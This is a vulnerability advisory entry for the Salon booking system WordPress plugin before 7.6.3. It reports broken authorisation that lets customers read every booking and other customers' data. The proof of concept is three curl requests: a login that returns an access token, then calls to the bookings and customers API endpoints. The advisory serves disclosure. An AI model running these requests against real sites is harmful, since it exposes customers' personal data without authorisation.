Lucene search
Huli from CymetricsWPEX-ID:5A5AB7A8-BE67-4F70-925C-9CB1EFF2FBE0HistoryMar 21, 2022 - 12:00 a.m.
Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure
2022-03-2100:00:00
Huli from Cymetrics
251
data disclosure
api access
access token
customer bookings
customer data
EPSS
0.002
Percentile
58.7%
The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer’s data
Make a booking to get a customer account
Login via API and get access token: curl "https://example.com/?rest_route=/salon/api/v1/login&[email protected]&password=11111111"
response: {"status":"OK","access_token":"5ad1d8d73d058958e98987bec31a12d25c14b9ba"}
Send requests to get all bookings/customers data using the access token
curl "http://example.com/?rest_route=/salon/api/v1/bookings/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"
curl "http://example.com/?rest_route=/salon/api/v1/customers/" -H "Access-Token:5ad1d8d73d058958e98987bec31a12d25c14b9ba"Related
patchstack
patchstack
wpvulndb
wpvulndb
Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure
2022-03-21 00:00:00
cvelist
cvelist
cve
cve
CVE-2022-0920
2022-04-11 15:15:08
prion
prion
Code injection
2022-04-11 15:15:00
nvd
nvd
CVE-2022-0920
2022-04-11 15:15:08